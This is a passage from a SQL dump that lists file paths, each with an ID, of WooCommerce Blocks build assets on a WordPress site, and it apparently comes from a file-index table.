ommerce-blocks/build/product-sku.css'),(10179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sku.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sku.js'),(10180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator-frontend.js'),(10181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator-rtl.css'),(10182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.css'),(10183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.js'),(10184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-frontend.js'),(10185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-rtl.css'),(10186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.css'),(10187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.js'),(10188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag/block.json'),(10189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag-style.asset.php'),(10190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag.asset.php'),(10191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag.js'),(10192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template/block.json'),(10193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template-rtl.css'),(10194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template-style.asset.php'),(10195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.asset.php'),(10196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.css'),(10197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.js'),(10198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-frontend.js'),(10199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-rtl.css'),(10200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.css'),(10201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.js'),(10202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated/block.json'),(10203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated-style.asset.php'),(10204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated.asset.php'),(10205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated.js'),(10206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute/block.json'),(10207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute-style.asset.php'),(10208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.asset.php'),(10209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.js'),(10210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter/block.json'),(10211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.asset.php'),(10212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.js'),(10213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-rtl.css'),(10214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-style.asset.php'),(10215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-frontend.js'),(10216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-rtl.css'),(10217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper.css'),(10218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.asset.php'),(10219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.css'),(10220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.js'),(10221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/related-products/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/related-products/block.json'),(10222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-rtl.css'),(10223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-style.asset.php'),(10224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.asset.php'),(10225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.css'),(10226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.js'),(10227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-rtl.css'),(10228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-style.asset.php'),(10229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.asset.php'),(10230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.css'),(10231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.js'),(10232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-frontend.asset.php'),(10233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-frontend.js'),(10234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product/block.json'),(10235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product-rtl.css'),(10236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product-style.asset.php'),(10237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.asset.php'),(10238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.css'),(10239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.js'),(10240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter/block.json'),(10241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.asset.php'),(10242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.js'),(10243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-rtl.css'),(10244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-style.asset.php'),(10245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-frontend.js'),(10246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-rtl.css'),(10247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper.css'),(10248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.asset.php'),(10249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.css'),(10250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.js'),(10251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices/block.json'),(10252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices-style.asset.php'),(10253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.asset.php'),(10254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.js'),(10255,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper--attribute-filter-wrapper--mini-cart-contents-block/cart-button--mi--d6bb29e6-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper--attribute-filter-wrapper--mini-cart-contents-block/cart-button--mi--d6bb29e6-style.js'),(10256,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper-frontend.js'),(10257,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--cart-blocks/order-summary-coupon-form--cart-blocks/order-summary--48e1e4bb-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--cart-blocks/order-summary-coupon-form--cart-blocks/order-summary--48e1e4bb-frontend.js'),(10258,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--rating-filter-wrapper--stock-filter-wrapper-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--rating-filter-wrapper--stock-filter-wrapper-frontend.js'),(10259,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-cross-sells-products--cart-blocks/cart-line-items--cart-blocks/cart-order--3c5fe802-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-cross-sells-products--cart-blocks/cart-line-items--cart-blocks/cart-order--3c5fe802-frontend.js'),(10260,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-line-items--checkout-blocks/order-summary-cart-items--mini-cart-contents---233ab542-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-line-items--checkout-blocks/order-summary-cart-items--mini-cart-contents---233ab542-frontend.js'),(10261,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/order-summary-shipping--checkout-blocks/billing-address--checkout-blocks/order--decc3dc6-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/order-summary-shipping--checkout-blocks/billing-address--checkout-blocks/order--decc3dc6-frontend.js'),(10262,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/order-summary-shipping--checkout-blocks/order-summary-shipping--checkout-block--24d3fc0c-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/order-summary-shipping--checkout-blocks/order-summary-shipping--checkout-block--24d3fc0c-frontend.js'),(10263,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/proceed-to-checkout-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/proceed-to-checkout-style.js'),(10264,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/billing-address--checkout-blocks/shipping-address-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/billing-address--checkout-blocks/shipping-address-frontend.js'),(10265,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-frontend.js'),(10266,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-style.js'),(10267,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--mini-cart-contents-block/products-table--price-filter-wrapper--product-price-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--mini-cart-contents-block/products-table--price-filter-wrapper--product-price-style.js'),(10268,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--mini-cart-contents-block/products-table-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--mini-cart-contents-block/products-table-style.js'),(10269,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--product-add-to-cart-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--product-add-to-cart-frontend.js'),(10270,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-rtl.css'),(10271,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-style.asset.php'),(10272,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style.css'),(10273,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.asset.php'),(10274,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.js'),(10275,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.asset.php'),(10276,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.js'),(10277,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style-rtl.css'),(10278,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style.css'),(10279,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.asset.php'),(10280,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.js'),(10281,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.asset.php'),(10282,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.js'),(10283,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.asset.php'),(10284,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.js'),(10285,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-rtl.css'),(10286,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-context.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-context.asset.php'),(10287,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-context.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-context.js'),(10288,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-hocs.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-hocs.asset.php'),(10289,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-hocs.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-shared-hocs.js'),(10290,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.asset.php'),(10291,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors.js'),(10292,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.asset.php'),(10293,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.css'),(10294,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.js'),(10295,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.asset.php'),(10296,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.js'),(10297,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.asset.php'),(10298,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.js'),(10299,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.asset.php'),(10300,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.js'),(10301,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.asset.php'),(10302,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.js'),(10303,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.asset.php'),(10304,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.js'),(10305,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.asset.php'),(10306,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.js'),(10307,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-shipping-method-pickup-location.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-shipping-method-pickup-location.asset.php'),(10308,'/home/tu